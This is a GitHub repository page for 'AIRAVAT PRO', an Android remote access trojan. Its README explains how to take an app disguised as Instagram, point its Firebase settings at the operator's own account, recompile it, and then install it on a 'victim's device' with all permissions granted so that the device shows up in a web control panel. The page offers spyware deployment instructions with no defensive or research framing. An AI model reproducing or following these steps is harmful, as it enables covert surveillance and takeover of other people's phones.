Skip to content

WHO-I-AM-001001/AIRAVAT-PRO-1

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

68 Commits
 
 
 
 
 
 
 
 

Repository files navigation

AIRAVAT PRO

Video


Android RAT

[*] Don't forget to add firebase url in smali_classes3/sigma/male/MainActivity.smali search for databaseURL and change it to your database url

AIRAVAT-PRO AIRAVAT-PRO
  1. Download Instagram.apk
  2. Decompile it using any Decompiler recommend above.
  3. Now open res/values/strings.xml file.
  4. Replace values of firebase_database_url , google_api_key , google_app_id , google_storage_bucket , project_id with your Firebase Account using google-services.json file which you have downloaded on step 5
    • Example
      <string name="firebase_database_url">https://your_database_url.firebase.com</string>
      <string name="google_api_key">your_api_key</string>
      <string name="google_app_id">your_app_id</string>
      <string name="google_storage_bucket">your_storage_bucket_url</string>
      <string name="project_id">project_id</string>
  5. Now compile the code with appt2.
  6. Install the app in victim's device and give all the permissions after that the connection will show up in web panel.
AIRAVAT-PRO AIRAVAT-PRO

❤️Supporters❤️

*https://github.com/Th30neAnd0nly

*https://github.com/AIRAVAT-pro

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • JavaScript 61.7%
  • HTML 21.5%
  • CSS 16.8%